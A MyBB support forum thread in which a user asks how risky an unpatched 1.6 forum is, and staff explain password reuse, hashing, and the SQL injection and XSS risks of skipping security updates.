MyBB Community Forums

Full Version: Looking for a staff member or developer answer on a security debate
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
There's a large forum I know of that hasn't moved to 1.8 and when asked why, they get defensive and angry, and insist there's nothing to worry about.  Some of my friends have had bad experiences and we're trying to get an official answer on just how dangerous a forum is that was never updated to 1.8?  What motivation could there be for not updating and could it be malicious?
The most common reason owners of large forums don't upgrade is because they have too many modifications or custom code that they don't want to/don't know how to update for 1.8. Or, they just don't know how to do the upgrade or are scared of doing it.

In terms of whether it's dangerous, if they've manually been applying security fixes that affect code from 1.6 as well as 1.8 then that would be good, but if it's an unpatched version of 1.6 then it wouldn't be advisable.

I highly doubt it's be "malicious", because it'd be the forum that got hacked not you specifically. Ultimately it's the forum owner's responsibility to make sure the software is up to date, the same way as the software on your computer or phone.
They definitely wouldn't know how to manually apply fixes based on everything I've seen from them for years.

If somebody who was using the same PW in that forum that they use for the email account they signed up with, and that email got hacked, is there a good possibility it's the forum that allowed it? Can an unpatched 1.6 let an attacker get PW's and emails they can try to login to the email accounts using those PW's with? That's one of the topics going around but hasn't been proven yet.
Quote:If somebody who was using the same PW in that forum that they use for the email account they signed up with, and that email got hacked

It doesn't count as getting hacked if you give your password to everyone you meet (by signing up everywhere with the same password). There is no way to fix this in software, other than forcing you to use unique passwords anyway, which is what 2-factor-authentication essentially does.
Good point. But that could be where they got it right? Without putting the blame on the users that used the same PW thinking it was secure like the owner said it was.

I'd like to present this to that owner and get him to realize there's a problem. On a scale of 0 - 10, how likely would you or any staff/developer say it is that an old 1.6 forum is letting attackers gain email & pw combinations to try logging into email accounts with? That owner tells us it's basically a 0 and I'm pretty sure he's lying or maybe just really doesn't know better, which is why this would help to get a really clear answer on. I want it to be that there's no way for him to deny knowing these risks anymore.
(2021-03-14, 08:17 PM)Der Meister Wrote: [ -> ]If somebody who was using the same PW in that forum that they use for the email account they signed up with, and that email got hacked, is there a good possibility it's the forum that allowed it? Can an unpatched 1.6 let an attacker get PW's and emails they can try to login to the email accounts using those PW's with? That's one of the topics going around but hasn't been proven yet.

I wouldn't go so far as saying that would definitely be how it got hacked as there'd be no way to prove that. The passwords are hashed so can't be retrieved, but there's no way of knowing if any patched SQL or XSS vulnerabilities have been exploited on an unpatched board.

(2021-03-14, 08:51 PM)Der Meister Wrote: [ -> ]I'd like to present this to that owner and get him to realize there's a problem. On a scale of 0 - 10, how likely would you or any staff/developer say it is that an old 1.6 forum is letting attackers gain email & pw combinations to try logging into email accounts with? That owner tells us it's basically a 0 and I'm pretty sure he's lying or maybe just really doesn't know better, which is why this would help to get a really clear answer on. I want it to be that there's no way for him to deny knowing these risks anymore.

Again, I don't think you could really definitively connect those events. Unless a shell script has been uploaded to log plaintext passwords, it wouldn't be easy to get plaintext passwords even if you had access to the database itself.

They definitely need to upgrade regardless though because otherwise the forum may just end up getting hacked.
Ok thanks guys; I think this will help.
Ultimately it comes down to the security of the entire board more than an individual user. If the forum gets hacked by an SQL injection, or someone's cookie gets stolen by an XSS attack, then that's everyone's problem. If it's true that patches haven't been applied manually, then there'll be several known vulnerabilities that could be exploited.

I can understand hesitance to upgrade if there are lots of custom changes, such as code changes, plugins, or a custom theme, but they should be able to be upgraded without too much trouble. If it's fear of it going wrong, taking backups and doing trial runs first mean the process is completely safe.

Routine maintenance and software updates come part and parcel with running a website, the same as you having to update WordPress and any other software - leaving it on an old version will only end in tears when someone exploits a vulnerability we fixed 5 years ago and causes mass data loss.